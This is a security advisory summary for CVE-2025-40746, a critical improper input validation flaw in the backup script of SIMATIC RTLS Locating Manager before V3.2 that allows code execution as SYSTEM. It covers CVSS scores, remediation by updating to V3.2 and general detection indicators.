Full Report
SIMATIC RTLS Locating Manager Before V3.2 contains an improper input validation vulnerability that could allow an authenticated remote attacker to execute arbitrary code with high privileges. Siemens has released a new version for SIMATIC RTLS Locating Manager and recommends to update to the latest version.
Analysis Summary
# Vulnerability: Arbitrary Code Execution in SIMATIC RTLS Locating Manager via Improper Input Validation
## CVE Details
- CVE ID: CVE-2025-40746
- CVSS Score: 9.1 (CVSS v3.1) / 9.4 (CVSS v4.0) (Critical)
- CWE: CWE-20: Improper Input Validation
## Affected Systems
- Products: SIMATIC RTLS Locating Manager
- Versions: All versions before V3.2
- Configurations: Requires an authenticated remote attacker.
## Vulnerability Description
The vulnerability exists because affected products do not properly validate input for a backup script within SIMATIC RTLS Locating Manager. Successful exploitation allows an authenticated remote attacker to execute arbitrary code with the highest privileges ('NT Authority\\SYSTEM'). The attack vector is Network, as it relies on pre-existing authentication within the application.
## Exploitation
- Status: Not explicitly stated as exploited in the wild, but PoC/exploit information is not detailed in the summary.
- Complexity: Low (AC:L) - Low Attack Complexity.
- Attack Vector: Network (AV:N)
## Impact
The impact is severe due to the ability to execute code with SYSTEM privileges:
- Confidentiality: High (H)
- Integrity: High (H)
- Availability: High (H)
## Remediation
### Patches
- Update SIMATIC RTLS Locating Manager to **Version V3.2 or later**.
- Vendor Reference for update: https://support.industry.siemens.com/cs/ww/en/view/109977124/
### Workarounds
- No specific functional workarounds are listed, but general security measures are recommended:
1. Protect network access to the devices using appropriate mechanisms.
2. Configure the operational environment according to Siemens' operational guidelines for Industrial Security.
## Detection
- Detection methods are not explicitly detailed, but typical indicators would involve monitoring for unusual activity associated with:
- Remote authentication attempts on the Locating Manager service.
- Execution of system-level processes or scripts related to backup functionality executed by an unauthorized remote user.
## References
- Vendor Advisory: SSA-493787
- Siemens ProductCERT: https://www.siemens.com/cert/advisories